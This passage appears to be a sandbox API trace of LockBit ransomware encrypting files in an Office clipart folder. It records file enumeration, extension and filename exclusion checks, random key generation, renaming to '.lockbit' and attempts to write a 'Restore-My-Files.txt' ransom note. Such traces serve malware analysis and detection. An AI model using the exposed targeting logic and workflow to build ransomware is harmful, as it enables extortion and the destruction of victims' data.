lpString2="J0233665.WMF") returned -1 [0153.190] lstrcmpiW (lpString1="thumbs.db", lpString2="J0233665.WMF") returned 1 [0153.190] lstrcmpiW (lpString1="iconcache.db", lpString2="J0233665.WMF") returned -1 [0153.190] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.190] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233665.WMF") returned=".WMF" [0153.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.190] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.190] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.191] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.192] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.192] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233665.WMF.lockbit") returned 72 [0153.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233665.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233665.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0153.197] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.197] malloc (_Size=0x40068) returned 0x3df0008 [0153.197] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12588) returned 1 [0153.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.199] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.203] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233665.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233665.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.203] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.203] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.205] free (_Block=0x1fa2ed8) [0153.205] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233665.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.205] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.205] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.205] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64f43f00, ftCreationTime.dwHighDateTime=0x1be809a, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64f43f00, ftLastWriteTime.dwHighDateTime=0x1be809a, nFileSizeHigh=0x0, nFileSizeLow=0x975e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0233992.WMF", cAlternateFileName="")) returned 1 [0153.205] lstrcmpiW (lpString1=".", lpString2="J0233992.WMF") returned -1 [0153.205] lstrcmpiW (lpString1="..", lpString2="J0233992.WMF") returned -1 [0153.205] PathFindExtensionW (pszPath="J0233992.WMF") returned=".WMF" [0153.205] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.205] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.206] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.206] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0233992.WMF") returned 1 [0153.207] lstrcmpiW (lpString1="ntldr", lpString2="J0233992.WMF") returned 1 [0153.207] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0233992.WMF") returned 1 [0153.207] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0233992.WMF") returned -1 [0153.207] lstrcmpiW (lpString1="autorun.inf", lpString2="J0233992.WMF") returned -1 [0153.207] lstrcmpiW (lpString1="thumbs.db", lpString2="J0233992.WMF") returned 1 [0153.207] lstrcmpiW (lpString1="iconcache.db", lpString2="J0233992.WMF") returned -1 [0153.207] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.207] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF") returned=".WMF" [0153.207] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.207] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.207] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.208] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.208] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF.lockbit") returned 72 [0153.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233992.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0153.209] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.209] malloc (_Size=0x40068) returned 0x1ff1e60 [0153.210] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=38750) returned 1 [0153.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0153.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0153.211] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.215] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.215] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.215] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.217] free (_Block=0x1fa2ed8) [0153.217] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.217] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.217] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.217] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f727e00, ftCreationTime.dwHighDateTime=0x1be7b5a, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f727e00, ftLastWriteTime.dwHighDateTime=0x1be7b5a, nFileSizeHigh=0x0, nFileSizeLow=0xcec6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0234000.WMF", cAlternateFileName="")) returned 1 [0153.217] lstrcmpiW (lpString1=".", lpString2="J0234000.WMF") returned -1 [0153.217] lstrcmpiW (lpString1="..", lpString2="J0234000.WMF") returned -1 [0153.217] PathFindExtensionW (pszPath="J0234000.WMF") returned=".WMF" [0153.217] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.217] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.218] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.218] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0234000.WMF") returned 1 [0153.219] lstrcmpiW (lpString1="ntldr", lpString2="J0234000.WMF") returned 1 [0153.219] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0234000.WMF") returned 1 [0153.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0234000.WMF") returned -1 [0153.219] lstrcmpiW (lpString1="autorun.inf", lpString2="J0234000.WMF") returned -1 [0153.219] lstrcmpiW (lpString1="thumbs.db", lpString2="J0234000.WMF") returned 1 [0153.219] lstrcmpiW (lpString1="iconcache.db", lpString2="J0234000.WMF") returned -1 [0153.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF") returned=".WMF" [0153.219] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.220] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.220] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.221] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.221] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.221] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.221] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.221] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF.lockbit") returned 72 [0153.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234000.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0153.222] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.222] malloc (_Size=0x40068) returned 0x3d70450 [0153.222] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=52934) returned 1 [0153.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0153.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0153.223] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0153.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.228] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.228] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.240] free (_Block=0x1fa2ed8) [0153.240] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.241] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.241] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.241] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fc7700, ftCreationTime.dwHighDateTime=0x1be7b5e, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97fc7700, ftLastWriteTime.dwHighDateTime=0x1be7b5e, nFileSizeHigh=0x0, nFileSizeLow=0x4b40, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0234001.WMF", cAlternateFileName="")) returned 1 [0153.241] lstrcmpiW (lpString1=".", lpString2="J0234001.WMF") returned -1 [0153.241] lstrcmpiW (lpString1="..", 